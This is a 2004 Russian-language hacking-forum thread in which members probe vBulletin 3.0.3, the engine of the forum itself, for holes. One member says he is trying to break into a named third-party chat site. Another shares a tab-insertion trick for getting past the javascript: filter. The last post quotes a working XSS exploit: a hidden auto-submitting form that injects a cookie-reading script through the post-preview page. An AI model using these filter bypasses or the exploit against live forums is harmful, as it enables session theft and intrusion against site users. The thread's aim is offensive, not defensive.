Форумы Уязвимости Vbulletin и здешний форум

Discussion in 'Уязвимости CMS/форумов' started by Монгол, 2 Dec 2004.

  1. Монгол

    Монгол New Member

    Joined:
    2 Dec 2004
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Уважаемые Господа,

    Этот движек напоминает Vbulletin и скорее всего он и есть... Хорошо хоть версию со страницы убрали :)))
    Вот одна уязвимость местного движка:

    Invalid argument supplied for foreach() in /home/host1220/www/forum/includes/functions.php on line 1815

    Короче, предложение такое: расковырять движек Vulletin версии 3.0.3 поскольку, похоже она самая последняя и самая "исправленная"

    Я сам пока не смог найти ничего серьезного.... уязвимости last.php и last10.php не в счет, так как не имеют отношение к дистрибутиву (см http://securitytracker.com)


    Если у кого есть какие мысли - сюда в форум, или мне на мыло [email protected]<>
     
  2. Access Denied

    Access Denied New Member

    Joined:
    2 Dec 2004
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    В качестве опытного эксперимента можно поюзать www.kavkazchat.com
    Пытаюсь его сломать, пока не выходит, но это временно:)
     
  3. Монгол

    Монгол New Member

    Joined:
    2 Dec 2004
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Персонально для Алгола: при использование bb кодов можно попасть во внутрь двойных кавычек.. а вот на javascript: стоит фильтр :) у тебя опыта больше, может попробуешь ковырнуть bb-коды...Кстати и при использование поля предварительного просмотра сообщения в поле textarea два раза сработал скрипт... повторить мне не удалось..и разобраться почему он сработал тоже.
     
  4. Algol

    Algol New Member

    Joined:
    29 May 2002
    Messages:
    1,759
    Likes Received:
    4
    Reputations:
    0
    Да, на джаву стоит фильтр, но это не проблема, обходится вставкой табуляции, типа:
    javaSCrip t:
    (другие методы обхода см здесь http://antichat.ru/crackchat/HTML )

    А в каких BB ты находил дыры?
    Я знаю по крайней мере одну уязвимость этого форума в BB. Может есть еще?
     
  5. Монгол

    Монгол New Member

    Joined:
    2 Dec 2004
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Алголу: Дай свою асю. У меня старая куда то девалась. Моя 9151093 По форуму: Здесь и далее "форум" имеется ввиду Vbulletin 3.0.3. Тег [ url] с фильтром на javascript мало того встfвляет http:// перед ссылкой.. Что есть плохо :) [ img] не проверял. Меня больше интересуют уязвимости Php форума, но пока только faq.php точно имеет уязвимость.
    Так же как уже было сказано выше похоже некоррекктно работает предварительный просмотр сообщений, пропуская скрипты и исполняя их. Пару раз у меня прошло. Потом как отрезало, разобраться я так и не смог.
     
  6. Монгол

    Монгол New Member

    Joined:
    2 Dec 2004
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    И еще... бл..кие двойные кавычки везде :) и фильтр на них.. что мне с ними делать не знаю :)
     
  7. Монгол

    Монгол New Member

    Joined:
    2 Dec 2004
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Ага.. вот это у меня два раза сработало... потом перестало..
    Proof of concept:
    While a user is previewing the post , both newreply.php and newthread.php
    do sanitize the input in 'Preview',but not Edit-panel,malicious code can be
    injected thru this flaw.

    Exploit:
    A page as below can lead visitor to a Preview page which contains XSS code.

    -------------------------Remote.html-------------------------
    <form action="http://host/newreply.php" name="vbform"
    method="post" style='visibility:hidden'>
    <input name="WYSIWYG_HTML"
    value="&lt;IMG src=&quot;javascript:alert(document.cookie)&quot;&gt;"/>
    <input name="do" value="postreply"/>
    <input name="t" value="123456" />
    <input name="p" value="123456" />
    <input type="submit" class="button" name="preview"/>
    </form>
    &lt;script&gt;
    document.all.preview.click();
    &lt;/script&gt;
    -----------------------------End-----------------------------